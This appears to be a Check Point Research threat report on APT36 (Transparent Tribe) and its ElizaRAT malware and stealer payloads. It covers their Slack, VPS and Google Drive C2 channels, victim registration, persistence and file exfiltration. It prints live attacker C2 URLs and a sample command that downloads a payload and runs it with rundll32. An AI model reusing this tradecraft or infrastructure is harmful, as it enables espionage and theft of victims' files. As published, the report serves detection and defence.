“Cloudy with a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT”

Summary:

Keypoints:

MITRE Techniques

Introduction

APT36, also known as Transparent Tribe, is a Pakistan-based threat actor notorious for persistently targeting Indian government organizations, diplomatic personnel, and military facilities. APT36 has conducted numerous cyber-espionage campaigns against Windows, Linux, and Android systems.

In recent campaigns, APT36 utilized a particularly insidious Windows RAT known as ElizaRAT. First discovered in 2023, ElizaRAT has significantly evolved to enhance its evasion techniques and maintain reliability in its command and control (C2) communication.

This report focuses on ElizaRAT’s evolution. We examine the various payloads and infrastructures employed by APT36 and the malware’s inner workings, including deployment methods, second-stage payloads, and the persistent use of cloud infrastructure.

Key Findings

• Check Point Research is closely tracking the persistent use of ElizaRAT, a custom implant deployed by Transparent Tribe (aka APT36) in targeted attacks on high-profile entities in India. We observed multiple, likely successful, campaigns of Transparent Tribe in India in 2024.
• Our analysis of recent campaigns reveals continuous enhancements in the malware’s evasion techniques, along with introducing a new stealer payload called “ApoloStealer.”
• ElizaRAT samples indicate a systematic abuse of cloud-based services, including Telegram, Google Drive, and Slack, to facilitate command and control communications.

ElizaRAT – Background and Evolution

First publicly disclosed in September 2023, ElizaRAT is a Windows Remote Access Tool (RAT) utilized by Transparent Tribe in targeted attacks. ElizaRAT infections are often initiated by CPL files distributed through Google Storage links, likely distributed by phishing. ElizaRAT used Telegram channels in its earlier variants to facilitate Command and Control (C2) communication.

Since its discovery, ElizaRAT’s execution methods, detection evasion, and C2 communication have all evolved. This was apparent in three distinct campaigns that utilized the malware at the end of 2023 and the beginning of 2024. In each campaign, the attacker used a different variant of ElizaRAT to download specific second-stage payloads that automatically collect information.

The main characteristics of ElizaRAT include:

• Written in .NET and the use of Costura to embed .NET and assembly modules.
• Execution through Control Panel (.CPL) files
• Use of cloud services such as Google, Telegram, and Slack for distribution and C2 communication
• Drops lure documents or videos as decoys
• In most samples, uses IWSHshell to create a Windows shortcut to the malware
• In most samples, uses SQLite as a resource to store files from the victim’s machine in a local database before exfiltration
• Generates and stores a unique victim ID in a separate file on the machine.

Slack Campaign

SlackAPI.dll – ElizaRAT

SlackAPI.dll (MD5: 2b1101f9078646482eb1ae497d44104) is an ElizaRAT variant that leverages Slack channels as C2 infrastructure. It was compiled at the end of 2023 and is executed as a CPL file. CPL files are directly invoked by a double click, making spear phishing a convenient infection route.

This variant most closely resembles the original Textsource variants of ElizaRAT in terms of asynchronous code, functionality, and execution. It follows all the ElizaRAT characteristics and base creation functionality:

• Generates user info file: Creates the Userinfo.dll file within the working directory and stores in it the victim ID in the following manner: <username>-<machinename>-<random between 200 to 600>.
• Creates the working directory: Establishes a new directory at %appdata%SlackAPI.
• Logging: Logs its actions to a text file (logs.txt) in the %appdata%SlackAPI directory.
• Time zone check: Checks if the local time zone is India Standard Time.
• Decoys: Drops a decoy mp4 file.

To register the victims in the attacker C2, the malware reads the content of Userinfo.dll and sends it to the C2 server. The malware then continuously checks the C2 for new commands every 60 seconds.

It consists of three classes of code:

• CplAppletDelegate – Includes the MAIN function and the fundamental execution processes.
• Communication – Responsible for the C2 communication.
• Controls – Contains functions for each command that the malware can receive from the C2.

The content received from the C2 is processed by the FormatMsgs function, which knows how to parse the content and run the related function from the Controls according to the command received from the C2.

The following are the commands the malware can process:

The C2 communication in SlackAPI.dll is managed through the Communication class, which uses Slack’s API to interact with the attacker. The ReceiveMsgsInList() function continuously polls the channel C06BM9XTVAS via the Slack API at https://slack[.]com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1, using the bot token and the victim ID content in the request. This function runs in an endless loop, checking for new commands every 60 seconds.

For message and file handling, the SendMsg() function sends messages to the C2 by posting to https://slack.com/api/chat.postMessage with the content and channel ID C06BWCMSF1S, while SendFile() uploads files to the same channel using https://slack.com/api/files.upload. The DownloadFile() function retrieves files from a provided URL, saving them to the victim’s machine using HttpClient and the bot token for secure access.

ApoloStealer (SlackFiles.dll)

The threat actor deployed an additional payload, which we named ApoloStealer, on specific targets. According to the compilation time, the variant of ApoloStealer used in this campaign was compiled one month after the ElizaRAT SlackAPI.dll variant, which might suggest that additional payloads are involved.

ApoloStealer employs techniques similar to other Transparent Tribe malware:

• Checks the local time zone is India Standard time.
• The working directory is the same as SlackAPI.dll – %appdata%SlackAPI.
• Includes SQLite.Interop.dll as a resource and two other mp4 files used as decoys.
• Creates a user info file with the name appid.dll and stores the victim ID in a similar manner: <username>-<machinename>-<random between 500-1000>.
• Registers the victim at the attacker C2, http://83.171.248[.]67/suitboot.php, and waits for a response.
• Creates an LNK shortcut via IWSHELL to run the file using rundll.
• Logs all its action in a local log file created in the working directory %appdata%SlackAPIrlogs.txt.

After creating the database file, ApoloStealer creates a table to store data in these fields: filename, file path, flag, type, and modified date. The malware then collects all DESKTOP files that do not start with ~ or ! and have one of the following extensions:

.ppt, .pptx, .pptm, .potx, .potm, .pot, .ppsx, .ppsm, .odp, .doc, .docm, .docx, .dot, .dotm, .dotx, .odt, .rtf, .pdf, .xls, .xlsx, .csv, .txt, .zip, .rar, .png, .jpg, .tar, .jpeg, .raw, .svg, .dwg, .heif, .heic, .psd

After storing all the relevant files in the database file, ApoloStealer sends the data to the C2 server at the URL http://83.171.248[.]67/oneten.php.

The malware repeats the same process for the Downloads directory, OneDrive directory, and each fixed drive on the machine, except for C:.

Circle Campaign

Compiled in January 2024, the Circle ElizaRAT variant is an improved version of the malware. It utilizes an additional dropper component, which results in much lower detection rates. The Circle campaign uses a payload that resembles the SlackFiles payload and uses a similar working directory (%appdata%SlackAPI).

Unlike other ElizaRAT variants, the Circle campaign does not use any cloud service as C2 infrastructure and instead uses a simple virtual private server (VPS) for C2 communication.

Circle Dropper

The sole purpose of the dropper is to set up the necessities for the execution of ElizaRAT. The function BringCircle drops and unpacks a zip file embedded as a resource containing the ElizaRAT malware. It also creates the working directory %appdata%CircleCpl and drops the decoy PDF document and MP4 file. Another feature of the malware, a known characteristic of ElizaRAT, is the creation of an LNK file for the malware, but there is no indication that any of the malware uses it. Note that the description of the LNK is Slack API File, which also implicates this cluster as part of the Slack campaign.

After dropping the malware, the dropper executes it with a simple Process.start() function.

Circle – ElizaRAT

This is the ElizaRAT variant utilized in the Circle campaign cluster. It performs the same checks and base creation as all other variants:

• Checks if the time zone is set to India Standard Time.
• Registers the victim’s information in a DLL file located in the working directory %appdata%CircleCpl, which is created by the dropper. It then sends its content to the attacker C2 at the URL http://38.54.84[.]83/MiddleWare/NewClient.
• Victim registration occurs in two files:
  • Applicationid.dll: Stores a victim ID combining a random number (100-1000), the username, and the machine name (<random 100-1000>-<username>-<machinename>), similar to other ElizaRAT variants.
  • Applicationinfo.dll: Stores detailed victim information in the format {machinename}>{username}>{IP}>{OS}>{machinetype}.
• Retrieves the victim’s IP address by accessing the URL https://check.torproject.org/api/ip, most likely to identify the victim’s outbound IP address.

To get a new task from the attacker, the malware sends the content of the applicationid.dll, with the addition of x002> at the start of the string, to the URL http://38.54.84[.]83/MiddleWare/GetTask and waits for the response.

There are three tasks the malware can receive from the attacker:

• at>{URI} – In this case, the malware triggers the DownloadFile() function, which will download the file from the URL http://38.54.84[.]83/uploads/{URI}.
• in>{URL} – The malware triggers the DownloadFile() function, which will download a file from the given URL.
• NA>NA – The malware sleeps for 2 minutes and then triggers the Awake() function again.

If the malware triggers the DownloadFile() function, it will also trigger the ExtractFile() function, designed to unpack a zip file.

The zip file contains the SQLite DLL, which will be used in the second-stage payload. It is extracted to %appdata%SlackAPI, the same working directory as the Slack campaign. If we examine the RunFile() function, we can see it is designated to execute the SlackFiles.dll stealer.

The fact that this malware is designated to download the SlackFiles.dll payload and use the same working directory as the Slack campaign suggests that these two activity clusters are part of the same campaign.

Google Drive Campaign

The initial infection vector used in this campaign is not clear. However, based on the file names, such as Amended Copy.cpl and Threat Alert 1307-JS-9.pdf issued vide NATRAD note number 2511 CLKj dated 10 Aug 2024 in aspect of exercise Tarang Shakti-2024.pdf.cpl, as well as past campaigns by the threat actor, they were likely sent via spear phishing.

Much like previous versions, the CPL file is a dropper responsible for setting up all the necessities for the next stage, including:

• Create the working directory ApplicationDataBaseFilteringEngine
• Register the victim
• Establish persistence through a schedule task
• Drop ElizaRAT files, including the decoy PDF, an X.509 certificate, and the main ElizaRAT variant (BaseFilterEngine.dll)

Command and Control

The ElizaRAT variant used in this campaign leverages Google Cloud for its C2 communication. Utilizing the Google C2 channel, the actor sends commands to download the next stage payload from different virtual private servers (VPS). In this campaign, we observed the use of three different VPS.

The main ElizaRAT malware (baseFilteringEngine.dll) uses the X.509 certificate to create a ServiceAccountCredential object for authenticating a Google Cloud Storage service account: xijinping@round-catfish-416409.iam.gserviceaccount.com. The email associated with this service account is fikumatry@gmail.com . The malware checks for the parent folder 1Gwy3yPyyYJVoOvCMfsmhhCknC-tiuNFv and lists all the files in that folder. Next, it locates the related victim’s tmp1 file, gets the commands and logs its actions.

The only command the malware can process is the Transfer command, which directs the malware to download a payload from a specific VPS address. Below is a sample format of the command the malware received for the chosen victims:

Transfer:!http://84.247.135[.]235:8080/phenomenon/SpotifyAB.zip:!rundll32.exe:!SpotifyAB.dll:!SpotifyAB.zip:!Mean:!Doj!@g8H6fb:!SpotifyAB

The malware splits the command at :! into an array, where each element represents a specific parameter of the operation:

When processing the command, the following sequence is triggered:

1. A folder is created as specified.
2. The function DownloadProtection downloads a file using an HttpWebRequest from a specified URL to the file with the specified name in the working folder.
3. The function Withdraw extracts the received file using the provided password.
4. The function BetaDrum creates a scheduled task that runs the file with the provided parent every 5 minutes.
5. A message is sent to the server indicating the successful operation.

Payloads – Google Drive Campaign

So far, we’ve seen two payloads utilized in this campaign: extensionhelper_64.dll and ConnectX.dll. Both payloads function as info stealers, each designed for a specific purpose. Despite these minor changes, the payloads’ core functionality and primary purpose remained consistent throughout the campaign.

ApoloStealer (Stealer Extensionhelper_64)

The extensionhelper_64.dll file is downloaded to the victim’s machine as SpotifyAB.dll or Spotify-news.dll and is executed by the scheduled task, which runs the Mean function via rundll32.exe. This payload is a file stealer that collects specific file types, stores their metadata in a database, and exfiltrates it to the C2 server.

First, the malware creates an SQLite database file, which interacts with using the DBmanager class and the SQLite.Interop.dll. The SQLite DLL is embedded in the malware in a protected zip file, which the malware extracted using a plain text password.

While iterating over all files on the fixed drives, the malware skips directories such as Program Files, Windows, ProgramData, and AppData to avoid processing system directories. It also filters out files that start with $, ., or ~, which are typically system or temporary files. The malware is only interested in these file suffixes:

.xla .xlam .xll .xlm .xlsm .xlt .xltm .xltx .dif .xls .xlsx .ppt .pptx .pot .potm .potx .ppam .pps .ppsm .ppsx .pptm .pub .rtf .sldm .sldx .pdf .jpg .png .jpeg .odf .odg .zip .csv .xlc .rar .tar

The malware stores the name, path, and another parameter called isUploaded for each relevant file. isUploaded is a boolean variable indicating whether the file was uploaded to the C2. If a file wasn’t uploaded to the C2, the malware calls the sendRequest function, which reads the file’s byte content and sends it to the C2 while updating its upload status.

Like the other malware in this campaign, it also hides some of its operations in a text blob, which it splits by ‘ ‘ (space). The information it tries to hide includes its C2 server and the different web pages it communicates with, even though they are not eventually used:

ConnectX – USB Stealer

An additional payload is designed to examine files on external drives, such as USBs. This malware utilizes WMI (Windows Management Instrumentation) to list all relevant files on external drives and targets the same file extensions. However, instead of storing them in a database, it stores them in an archive it creates in the BaseFilteringEngine working directory.

The malware uses WMI to monitor the creation of new disk drives every two seconds, most likely to detect the insertion of a USB drive:

SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA 'Win32_DiskDrive'

For each device, it retrieves the device ID and serial number and checks for the correct disk partition to iterate on. Unlike other ElizaRAT-associated stealers, ConnectX doesn’t have a C2 server to exfiltrate the data to; it just stores the data in a zip file in the ElizaRAT working directory %appdata%BaseFilteringEngine.

Attribution

ElizaRAT is a custom tool known to be employed exclusively by “Transparent Tribe” against targets similar to those described in this report. This is in addition to other indicators linked to the group’s campaigns, including using an overlapping email account in a different activity cluster targeting Linux systems.

Like other malware associated with Transparent Tribe, all the samples presented here used the name Apolo Jones. In the Google Drive campaign, the decoy PDF file attributes its authorship to Apolo Jones, a distinctive name previously observed in various aspects of Transparent Tribe’s operations.

The use of Apolo Jones occurs differently in the campaigns. For example, in the Circle dropper, the password ApoloJones2024 is used to uncompress the zip file. In addition, the function responsible for checking the time zone in the SlackFiles.dll payload is also named ApoloJones.

Victimology

The internal checks the ElizaRAT variants perform suggest the campaigns exclusively targeted Indian systems, evidenced by each malware variant’s initial function of verifying whether the system’s time zone was set to 'India Standard Time’.

Conclusion

The progression of ElizaRAT reflects APT36’s deliberate efforts to enhance their malware to better evade detection and effectively target Indian entities. By integrating cloud services like Google Drive, Telegram, and Slack into their command and control infrastructure, they exploit commonly used platforms to mask their activities within regular network traffic.

Introducing new payloads such as ApolloStealer marks a significant expansion of APT36’s malware arsenal and suggests the group is adopting a more flexible, modular approach to payload deployment. These methods primarily focus on data collection and exfiltration, underscoring their sustained emphasis on intelligence gathering and espionage.

Protection

Harmony Endpoint

• APT.Win.ElizaRAT.B/C/D

Threat Emulation

• RAT.Wins.Eliza.ta.A/B/C/D

IOCs

Files

Network

The post Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT appeared first on Check Point Research.

Source: Original Post